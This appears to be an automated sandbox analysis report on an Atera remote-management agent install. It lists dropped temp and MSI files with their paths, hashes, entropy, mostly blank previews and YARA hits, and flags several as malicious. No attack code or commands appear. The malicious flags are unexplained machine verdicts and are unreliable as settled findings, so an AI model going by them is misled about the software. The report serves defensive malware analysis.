                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{F~.(F~.(F~.(O.8(U~.(F~.(.|.(O.>(\~.(O.((.~.(O./(.~.(O.!(A~.(O.?(G~.(O.:(G~.(RichF~.(................PE..L.....Gg............................./............@.................................Rwd.............................................. ..(............0d..(..........`................................i..@...................D........................text............................... ..`.rdata..............................@..@.data....^......."..................@....rsrc...(.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\ateraAgentSetup64_1_8_7_2.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF02028F33E07D4190.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.0818781362553704
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO7rFc7DEEKNE9oCoEAVky6l6t/:2F0i8n0itFzDHFnwD7j6t/
                                                                                                                                                                                                                                        MD5:BAA575166045505453AD7188E5F48C77
                                                                                                                                                                                                                                        SHA1:9437F85607EE74DA990442D7E29E9ADD7D7E657C
                                                                                                                                                                                                                                        SHA-256:9197A3435AAB5497FC20C094805579963B04ADB44126228AC511C227DC628691
                                                                                                                                                                                                                                        SHA-512:9F94385FA4FC33E72216154FF821E2125EE825350CF6CA0CF31329144DEA948C1917CBEB69CF1F8696EDD6E5ADDD5DD1F862A95001AB4126C4BAB401DC7AE15E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF021FAEA6822634F5.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF04AABA45F06EFF0E.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2583168101301414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:jgduksNveFXJ7T5fcvwPVqISoedGPdGfoprdStedGPdGRub1n:cdVjTIwPoIVox
                                                                                                                                                                                                                                        MD5:C8CC67F116455FC7394F8764E2F406D6
                                                                                                                                                                                                                                        SHA1:D4E0561229655095728AB7124BC6627FD4D909BB
                                                                                                                                                                                                                                        SHA-256:B02AC5B89791AE815507F422D1AE46EA1AD2B4AE2F0E52B9A8006747FE5A77D8
                                                                                                                                                                                                                                        SHA-512:E51D8078030934691E3BF4A594BFFA0B2212EBABB54B936C4627BE7236FF569926C8DB242D3E477B0B6DC75284BCEE0AE806B4D33A83BF3C132236C20240E0CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF1CD5E580F6F09CE0.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.077966497703753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1LtCmOuPrfkiVky6l51:2F0i8n0itFzDHFzTPrfWr
                                                                                                                                                                                                                                        MD5:785EA75A2FB1DB6D9155B28A1291DAF3
                                                                                                                                                                                                                                        SHA1:6B86F7E077D0A8823383FBB776313FEDB17BFDEA
                                                                                                                                                                                                                                        SHA-256:BCD727E77C067BD5A31C13E8024F00ED60381D9AB725CAE2E6777A5708C9DDE0
                                                                                                                                                                                                                                        SHA-512:1834BBF627951711C96708EE7AA4B6C069055E832C717561DC77592E68EFB93E65FE825A5D3D13859057C93BE96CC12701D725491C4CFC49A4EE4FD40942E72A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF1D65F7D0F3DF037C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF20796E8FF448BF6A.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6215570221396338
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8PhPuRc06WXJEnT50DtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:thP1HnT6DwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:9A3113EAC7D8A989BE1CE1E2070EE351
                                                                                                                                                                                                                                        SHA1:BDBF09D4E82A7A6705CD8CD3EC624F90AB966F3F
                                                                                                                                                                                                                                        SHA-256:3BDFCF83E100C2F53B17F21B5A49898E9F4418C2976F6A407B178E5F2A33527C
                                                                                                                                                                                                                                        SHA-512:7E6B5EA7D82954D5436D02EC5C700EAD2A4F15A8A212B2ED8C7E41C0A6C362373581B01F85644BF04367BE1247D4787A017A0315438D4992E7E6E6F297621AA6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF20796E8FF448BF6A.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF26C371C69F9AD2F4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF369C3B750C2D1E54.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2312144998830985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:7rVUuKNveFXJbT5IDoqISoedGPdGTpaStedGPdGTn:7xU8DTOD9IRD
                                                                                                                                                                                                                                        MD5:93D74044F7E2E35CAFEA58A7B4079F7E
                                                                                                                                                                                                                                        SHA1:6BACF8DE398952F2EA23DF57C8FD37CB6085B1B5
                                                                                                                                                                                                                                        SHA-256:7EC5E4A0ED30259E28A258A688C20650F3082983C7B3BCE0CACD0B27AF045340
                                                                                                                                                                                                                                        SHA-512:DE022EEABE9055C0ACDC6171CB983F7B155409829D1F850BEC084CA5A367FB506284143B0F5B1322B0001A8A1CC2603ED00691F601816F1A322F809D57C1754C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF369C3B750C2D1E54.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4483A509910CE413.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF48C57A6A936CEC5B.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4C88F82BB36EAF1F.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4D1DB12312A5008C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF5A19BC0F45D3B82A.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6215570221396338
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8PhPuRc06WXJEnT50DtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:thP1HnT6DwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:9A3113EAC7D8A989BE1CE1E2070EE351
                                                                                                                                                                                                                                        SHA1:BDBF09D4E82A7A6705CD8CD3EC624F90AB966F3F
                                                                                                                                                                                                                                        SHA-256:3BDFCF83E100C2F53B17F21B5A49898E9F4418C2976F6A407B178E5F2A33527C
                                                                                                                                                                                                                                        SHA-512:7E6B5EA7D82954D5436D02EC5C700EAD2A4F15A8A212B2ED8C7E41C0A6C362373581B01F85644BF04367BE1247D4787A017A0315438D4992E7E6E6F297621AA6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF5A19BC0F45D3B82A.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF64CCC308CB9F1910.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2312144998830985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:7rVUuKNveFXJbT5IDoqISoedGPdGTpaStedGPdGTn:7xU8DTOD9IRD
                                                                                                                                                                                                                                        MD5:93D74044F7E2E35CAFEA58A7B4079F7E
                                                                                                                                                                                                                                        SHA1:6BACF8DE398952F2EA23DF57C8FD37CB6085B1B5
                                                                                                                                                                                                                                        SHA-256:7EC5E4A0ED30259E28A258A688C20650F3082983C7B3BCE0CACD0B27AF045340
                                                                                                                                                                                                                                        SHA-512:DE022EEABE9055C0ACDC6171CB983F7B155409829D1F850BEC084CA5A367FB506284143B0F5B1322B0001A8A1CC2603ED00691F601816F1A322F809D57C1754C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF74BCA6A3F5E2B8F7.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF8D0A16BC2D6921AC.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2312144998830985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:7rVUuKNveFXJbT5IDoqISoedGPdGTpaStedGPdGTn:7xU8DTOD9IRD
                                                                                                                                                                                                                                        MD5:93D74044F7E2E35CAFEA58A7B4079F7E
                                                                                                                                                                                                                                        SHA1:6BACF8DE398952F2EA23DF57C8FD37CB6085B1B5
                                                                                                                                                                                                                                        SHA-256:7EC5E4A0ED30259E28A258A688C20650F3082983C7B3BCE0CACD0B27AF045340
                                                                                                                                                                                                                                        SHA-512:DE022EEABE9055C0ACDC6171CB983F7B155409829D1F850BEC084CA5A367FB506284143B0F5B1322B0001A8A1CC2603ED00691F601816F1A322F809D57C1754C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8D0A16BC2D6921AC.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF917ED5094803A88B.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
